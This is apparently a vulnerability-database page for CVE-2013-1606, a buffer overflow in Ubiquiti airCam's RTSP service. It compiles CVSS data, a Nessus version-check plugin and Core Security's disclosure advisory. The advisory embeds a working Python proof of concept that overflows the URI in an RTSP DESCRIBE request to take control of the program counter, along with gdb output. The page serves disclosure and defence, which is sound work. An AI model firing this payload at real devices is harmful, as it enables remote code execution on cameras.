Vulnerabilities > CVE-2013-1606 - Improper Restriction of Operations Within the Bounds of A Memory Buffer vulnerability in UI products

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
ui
CWE-119
nessus
exploit available

Summary

Buffer overflow in the ubnt-streamer RTSP service on the Ubiquiti UBNT AirCam with airVision firmware before 1.1.6 allows remote attackers to execute arbitrary code via a long rtsp: URI in a DESCRIBE request. Per: http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service 'Vulnerable Packages Cameras Models: airCam, airCam Mini, airCam Dome. Firmware Version Verified: AirCam v1.1.5.'

Vulnerable Configurations

Part Description Count
OS
Ui
1
Hardware
Ui
3

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Overflow Buffers
    Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
  • Client-side Injection-induced Buffer Overflow
    This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
  • Filter Failure through Buffer Overflow
    In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
  • MIME Conversion
    An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.

Exploit-Db

descriptionUbiquiti airCam RTSP Service 1.1.5 - Buffer Overflow. CVE-2013-1606. Dos exploit for hardware platform
fileexploits/hardware/dos/26138.txt
idEDB-ID:26138
last seen2016-02-03
modified2013-06-12
platformhardware
port554
published2013-06-12
reporterCore Security
sourcehttps://www.exploit-db.com/download/26138/
titleUbiquiti airCam RTSP Service 1.1.5 - Buffer Overflow
typedos

Nessus

NASL familyMisc.
NASL idUBIQUITI_AIRCAM_1_2_0.NASL
descriptionAccording to its self-reported version number, the firmware installed on the remote host is prior to 1.2.0. It is, therefore, affected by a remote code execution vulnerability in the
last seen2020-06-01
modified2020-06-02
plugin id72580
published2014-02-19
reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/72580
titleUbiquiti airCam < 1.2.0 ubnt-streamer RTSP Service Remote Code Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(72580);
  script_version("1.3");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_cve_id("CVE-2013-1606");
  script_bugtraq_id(60487);
  script_xref(name:"EDB-ID", value:"26138");

  script_name(english:"Ubiquiti airCam < 1.2.0 ubnt-streamer RTSP Service Remote Code Execution");
  script_summary(english:"Checks the Ubiquiti airCam firmware version number.");

  script_set_attribute(attribute:"synopsis", value:
"The remote device is affected by a remote code execution
vulnerability.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version number, the firmware installed
on the remote host is prior to 1.2.0.  It is, therefore, affected by a
remote code execution vulnerability in the 'ubnt-streamer' RTSP service
when parsing an overly large URI of a RTSP request message.  An attacker
can exploit this issue to cause a denial of service or execute arbitrary
code.");
  # https://www.secureauth.com/labs/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?a59c9d93");
  # http://community.ubnt.com/t5/airVision-Blog/airVision-2-1-1-airCam-1-2-fw-Released/ba-p/486207
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b598e5bd");
  script_set_attribute(attribute:"solution", value:"Upgrade to firmware version 1.2.0 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/06/11");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/06/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/02/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:ubnt:airvision_firmware");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.");

  script_dependencies("ubiquiti_aircam_detect.nbin");
  script_require_keys("Ubiquiti/airCam/Device", "Ubiquiti/airCam/Version");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

kb_base = "Ubiquiti/airCam";

version = get_kb_item_or_exit(kb_base+"/Version");

fixed = '1.2.0';
if (ver_compare(ver:version, fix:fixed, strict:FALSE) == -1)
{
  if (report_verbosity > 0)
  {
    report =
      '\n  Installed version : ' + version +
      '\n  Fixed version     : ' + fixed + '\n';
    security_hole(port:0, extra:report);
  }
  else security_hole(0);
}
else exit(0, "The host is not affected since firmware version " + version + " is installed.");

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/121986/CORE-2013-0430.txt
idPACKETSTORM:121986
last seen2016-12-05
published2013-06-12
reporterCore Security Technologies
sourcehttps://packetstormsecurity.com/files/121986/Ubiquiti-airCam-RTSP-Service-Buffer-Overflow.html
titleUbiquiti airCam RTSP Service Buffer Overflow

Seebug

bulletinFamilyexploit
descriptionCore Security - Corelabs Advisory http://corelabs.coresecurity.com Buffer overflow in Ubiquiti airCam RTSP service 1. *Advisory Information* Title: Buffer overflow in Ubiquiti airCam RTSP service Advisory ID: CORE-2013-0430 Advisory URL: http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service Date published: 2013-06-11 Date of last update: 2013-06-11 Vendors contacted: Ubiquiti Release mode: Coordinated release 2. *Vulnerability Information* Class: Classic buffer overflow [CWE-120] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1606 3. *Vulnerability Description* The Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer overflow when parsing the URI of a RTSP request message. This bug allows remote attackers to execute arbitrary code via RTSP request message. 4. *Vulnerable Packages* . Cameras Models: airCam, airCam Mini, airCam Dome. . Firmware Version Verified: AirCam v1.1.5. . Other devices are probably affected too, but they were not checked. 5. *Non-Vulnerable Packages* . firmware v1.2.0 (airVision 2.x platform). . firmware v1.1.6 (airVision 1.x platform). 6. *Vendor Information, Solutions and Workarounds* Patched firmware versions can be downloaded from the Ubiquiti official website [2], [3]. 7. *Credits* These vulnerabilities were discovered and researched by Andres Blanco from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* ``` # # Author: Andres Blanco - CORE Security Technologies. # # The contents of this software are copyright (c) 2013 CORE Security and (c) 2013 CoreLabs, # and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) # License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ # # THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR # CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF # THIS SOFTWARE. # import socket class RtspRequest(object): def __init__(self, ip_address, port): self._ip_address = ip_address self._port = port def generate_request(self, method, uri, headers): data = "" data += "%s %s RTSP/1.0\r\n" % (method, uri) for item in headers: header = headers[item] data += "%s: %s\r\n" % (item, header) data += "\r\n" return data def send_request(self, data): sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sd.settimeout(15) sd.connect((self._ip_address, self._port)) sd.send(data) resp = sd.recv(2048) sd.close() return resp if __name__ == "__main__": ip = "192.168.100.1" anRtsp = RtspRequest(ip, 554) data = "" data += "A" * 271 data += "\x78\x56\x34\x12" uri = "rtsp://%s/%s/live/ch00_0" % (ip, data) headers = { "CSeq" : "1" } req = anRtsp.generate_request("DESCRIBE", uri, headers) rsp = anRtsp.send_request(req) ``` Below the gdb session when executing the PoC. ``` AirCam.v1.1.5# ./gdb --pid 358 ... Attaching to process 358 warning: process 358 is a cloned process Reading symbols from /bin/ubnt-streamer...(no debugging symbols found)...done. Reading symbols from /lib/libpthread.so.0...(no debugging symbols found)...done. ... 0x401c60a0 in select () from /lib/libc.so.6 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x12345678 in ?? () (gdb) info registers r0 0x0 0 r1 0x1 1 r2 0xffffffff 4294967295 r3 0x1 1 r4 0x41414141 1094795585 r5 0x41414141 1094795585 r6 0x41414141 1094795585 r7 0xd7198 881048 r8 0x0 0 r9 0x0 0 r10 0xc6119 811289 r11 0xc625f 811615 r12 0x23 35 sp 0x40a7eaf0 0x40a7eaf0 lr 0x48d34 298292 pc 0x12345678 0x12345678 cpsr 0x20000010 536870928 (gdb) info stack #0 0x12345678 in ?? () #1 0x00048d34 in ?? () #2 0x00048d34 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) x/50xw $sp-0x80 0x40a7ea70: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7ea80: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7ea90: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7eaa0: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7eab0: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678 0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100 0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8 0x40a7eb10: 0x000d73f6 0x000c6267 0x00000001 0x000c6060 0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780 0x40a7eb30: 0x00000000 0x000c611c ``` 9. *Report Timeline* . 2013-05-02: Core Security Technologies notifies the Ubiquiti team of the vulnerability. Publication date is set for May 29th, 2013. . 2013-05-02: Vendor acknowledges the receipt of the email and asks for technical details. . 2013-05-02: A draft report with technical details and a PoC sent to Ubiquiti team. . 2013-05-03: Vendor notifies that a new firmware version should address this vulnerability. It will be released shortly to the alpha and beta community. . 2013-05-06: Core notifies that the advisory will be re-scheduled to be released when patches are available to the alpha and beta community and asks for a tentative release date. . 2013-05-09: Core asks for a status update regarding this vulnerability and a tentative release date. . 2013-05-13: Vendor notifies the firmware is still in internal testing and the release date will be confirmed in the following days. . 2013-05-27: Core notifies that there was no answer in the last 2 weeks regarding the release date. Core also notifies that the advisory was re-scheduled for Jun 4th, and asks for a clear timeline to justify keep delaying the release. . 2013-05-28: Vendor notifies that the new firmware is almost done and a confirmed date will be notified in the following days. . 2013-05-29: Core asks if a beta firmware is available for downloading. . 2013-05-29: Vendor notifies that they have a v1.1.6 build of the firmware which is being tested internally and will be released very soon, probably this week. However, it is not yet available on the ubnt.com/download site. . 2013-05-29: First release date missed. . 2013-06-03: Core asks for a status update. . 2013-06-03: Vendor notifies that they do not have a specific release date yet. . 2013-06-11: Vendor notifies that they released firmware 1.2.0 along with airVision 2 [2][3], and a public announcement will be made soon. Release of firmware 1.1.6 (for the airVision 1.x platform) has to be defined. . 2013-06-11: Advisory CORE-2013-0430 published. 10. *References* [1] http://www.ubnt.com. [2] Ubiquiti downloads http://www.ubnt.com/download#AirCam. [3] Ubiquiti firmware v1.2.0 http://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
idSSV:79784
last seen2017-11-19
modified2014-07-01
published2014-07-01
reporterRoot
titleUbiquiti airCam RTSP Service 1.1.5 - Buffer Overflow